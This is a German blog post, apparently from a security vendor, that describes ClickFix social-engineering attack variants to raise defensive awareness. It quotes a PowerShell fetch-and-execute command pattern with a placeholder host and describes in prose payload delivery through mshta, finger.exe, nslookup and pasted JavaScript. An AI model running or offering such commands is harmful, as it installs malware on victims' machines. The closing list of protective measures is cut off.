ClickFix-Variationen

Verschiedene Varianten der ClickFix-Technik, die bei echten Angriffen eingesetzt werden.

ClickFix-Variationen

Vor etwa einem Jahr gab es in unserem Blog einen Artikel über die ClickFix-Technik, die sich bei Angreifern wachsender Beliebtheit erfreut. Bei ClickFix-Angriffen wird das Opfer unter verschiedenen Vorwänden dazu gebracht, auf seinem Computer einen bösartigen Befehl auszuführen. Für Cybersicherheitslösungen sieht dies aus, als würde der Befehl im Namen des aktiven Nutzers und mit dessen Berechtigungen ausgeführt.

Als diese Technik aufkam, überzeugten Cyberkriminelle ihre Opfer einfach davon, einen Befehl auszuführen. Als Grund gaben sie an, dadurch würde ein Problem behoben oder ein Captcha gelöst. In den meisten Fällen handelte es sich bei dem bösartigen Befehl um ein PowerShell-Skript. Seitdem haben sich Angreifer eine ganze Reihe neuer Tricks einfallen lassen und es gibt viele neue Varianten zur Übermittlung bösartiger Nutzdaten. Darum ist es wichtig, diese Bedrohungen nicht aus dem Blick zu verlieren.

Verwendung von mshta.exe

Im vergangenen Jahr veröffentlichten Microsoft-Experten einen Bericht über Cyberangriffe gegen Hotelbesitzer, die mit Booking.com zusammenarbeiten. Die Angreifer verschickten gefälschte Benachrichtigungen des Dienstes oder E-Mails, die angeblich von Gästen stammten und auf eine Bewertung aufmerksam machten. In beiden Fällen enthielt die E-Mail einen Link zu einer Website, die Booking.com nachahmte. Dort sollte das Opfer zuerst beweisen, dass es kein Roboter ist. Dazu musste über das Menü „Ausführen“ ein Code ausgeführt werden.

Zwischen diesem Angriff und ClickFix gibt es zwei wesentliche Unterschiede. Erstens wird der Nutzer nicht aufgefordert, eine Codezeile zu kopieren (dies könnte leicht Misstrauen erwecken). Der Code wird von der bösartigen Website in die Zwischenablage kopiert. Dies passiert wahrscheinlich, wenn der Nutzer auf ein Kontrollkästchen klickt, das den reCAPTCHA-Mechanismus nachahmt. Zweitens ruft die bösartige Zeichenfolge das legitime Dienstprogramm mshta.exe auf, das dazu dient, in HTML geschriebene Programme auszuführen. Das Dienstprogramm kontaktiert dann den Server des Angreifers und führt die bösartige Nutzlast aus.

TikTok-Videos und PowerShell mit Administratorrechten

Im Oktober 2025 berichtete BleepingComputer über eine Kampagne, bei der Malware durch Anleitungen in TikTok-Videos verbreitet wurden. Die Videos sahen aus wie Video-Tutorials zur kostenlosen Aktivierung proprietärer Software. Darin wurde der Rat gegeben, PowerShell mit Administratorrechten zu starten und anschließend den Befehl iex (irm {schädliche Adresse}) auszuführen. Der irm-Befehl lädt ein schädliches Skript von einem Server der Angreifer herunter und der Befehl iex (Invoke-Ausdruck) führt das Skript aus. Das Skript wiederum lädt eine Infostealer-Malware auf den angegriffenen Computer nach.

Verwendung des Finger-Protokolls

Eine weitere ungewöhnliche Variante des ClickFix-Angriffs nutzt den bekannten Captcha-Trick. Das bösartige Skript wird dabei über das veraltete Finger-Protokoll geladen. Mit dem gleichnamigen Dienstprogramm können Daten über einem bestimmten Nutzer auf einem Remote-Server abgefragt werden. Zwar wird das Protokoll heutzutage nur noch selten verwendet, trotzdem wird es von Windows, macOS und einer Reihe Linux-basierter Systeme immer noch unterstützt.

Der Nutzer wird dazu gebracht, die Befehlszeilenschnittstelle zu öffnen und dort einen Befehl auszuführen, der über das Finger-Protokoll (via TCP-Port 79) eine Verbindung mit dem Server des Angreifers aufbaut. Das Protokoll überträgt nur Textinformationen. Dies reicht jedoch aus, um ein weiteres Skript auf den Computer des Opfers herunterzuladen, das anschließend die Malware installiert.

CrashFix-Variante

Eine andere Variante von ClickFix unterscheidet sich dadurch, dass sie ausgefeiltes Social Engineering verwendet. Damit wurden Nutzer angegriffen, die nach einem Tool suchten, um Werbung, Tracker, Malware und andere unerwünschte Inhalte auf Webseiten zu blockieren. Bei der Suche nach einer geeigneten Erweiterung für Google Chrome stießen die Opfer auf NexShield – Advanced Web Guardian. Diese Erweiterung war zwar der Klon einer funktionierenden Software, brachte den Browser aber irgendwann zum Absturz, informierte fälschlicherweise über ein Sicherheitsproblem und forderte dazu auf, das Problem durch eine „Untersuchung“ zu beheben. Wenn der Nutzer zustimmte, wurde er angewiesen, das Menü „Ausführen“ zu öffnen und einen Befehl auszuführen, den die Erweiterung zuvor in die Zwischenablage kopiert hatte.

Der Befehl kopierte die bereits erwähnte Datei finger.exe in ein temporäres Verzeichnis, benannte sie in ct.exe um und startete sie dann mit der Adresse des Angreifers. Der Rest des Angriffs verlief wie der oben genannte Fall. Als Reaktion auf die Anfrage des Finger-Protokolls wurde ein bösartiges Skript übertragen, das einen Remote-Zugriffs-Trojaner (diesmal ModeloRAT) startete und installierte.

Malware-Bereitstellung via DNS-Lookup

Das Microsoft Threat Intelligence-Team berichtete über eine noch komplexere ClickFix-Bedrohung. Leider wurde der Social-Engineering-Trick nicht genauer beschrieben, aber die Methode zur Übermittlung der bösartigen Nutzlast ist wirklich interessant. Damit die Erkennung des Angriffs in Unternehmensumgebungen schwerer zu erkennen war und die bösartige Infrastruktur möglichst lange überlebte, bauten die Angreifer einen zusätzlichen Schritt ein: den Zugriff auf einen von den Angreifern kontrollierten DNS-Server.

Etwas genauer: Das Opfer wurde auf irgendeine Weise dazu gebracht, einen bösartigen Befehl zu kopieren und auszuführen. Dann wurde im Namen des Nutzers über das legitime Dienstprogramm nslookup an den DNS-Server eine Anfrage gesendet, die Daten für die Domäne example.com abfragte. Der Befehl enthielt die Adresse eines DNS-Servers, der von den Angreifern kontrolliert wurde. Dieser gab eine Antwort zurück, die unter anderem ein schädliches Skript enthielt, das wiederum die endgültige Nutzlast abholte (auch bei diesem Angriff war es ModeloRAT).

Krypto-Köder und JavaScript als Nutzlast

Die nächste Angriffsvariante ist aufgrund des mehrstufigen Social Engineering interessant. Die Angreifer verbreiteten in Pastebin-Kommentaren aktiv eine Nachricht über einen angeblichen Fehler im Kryptobörsen-Service Swapzone.io. Kryptobesitzer wurden eingeladen, eine von den Betrügern erstellte Ressource zu besuchen. Dort gab es eine genaue Anleitung zur Ausnutzung des Fehlers und es wurde versprochen, man könne in wenigen Tagen bis zu 13.000 US-Dollar „verdienen“.

Es wurde erklärt, wie man aufgrund der Schwachpunkte Kryptoguthaben zu einem günstigen Kurs tauschen konnte. Dazu sollte das Opfer die Website des Dienstes im Chrome-Browser öffnen, den Text „javascript:“ in die Adressleiste eintippen und das von der Website des Angreifers kopierte JavaScript-Skript einfügen und ausführen. In Wirklichkeit hatte das Skript natürlich keinerlei Einfluss auf die Wechselkurse, sondern ersetzte lediglich die Adressen der Bitcoin-Wallets. Sobald das Opfer versuchte, etwas umzutauschen, landete das Geld auf den Konten der Angreifer.

So schützt du dein Unternehmen vor ClickFix-Angriffen

Die einfachsten Angriffe, die die ClickFix-Technik nutzen, lassen sich abwehren, indem die Tastenkombination [Win]+ [R] auf geschäftlichen Geräten blockiert wird. Die oben genannten Beispiele zeigen jedoch, dass es noch viel komplexere Angriffsmethoden gibt, bei denen Nutzer aufgefordert werden, selbst bösartigen Code auszuführen.

Daher unser wichtigster Rat: Schärfe bei allen Mitarbeitern das Bewusstsein für Cybersicherheit. Wenn Mitarbeiter aufgefordert werden, das System auf ungewöhnliche Weise zu manipulieren oder Code zu kopieren und einzufügen, muss klar sein: Hier können Cyberkriminelle am Werk sein. Für Schulungen zum Sicherheitsbewusstsein eignet sich die Kaspersky Automated Security Awareness Platform.

Zum Schutz vor solchen Cyberangriffen empfehlen wir darüber hinaus folgende Maßnahmen:

Tipps
  • Für alle anderen Länder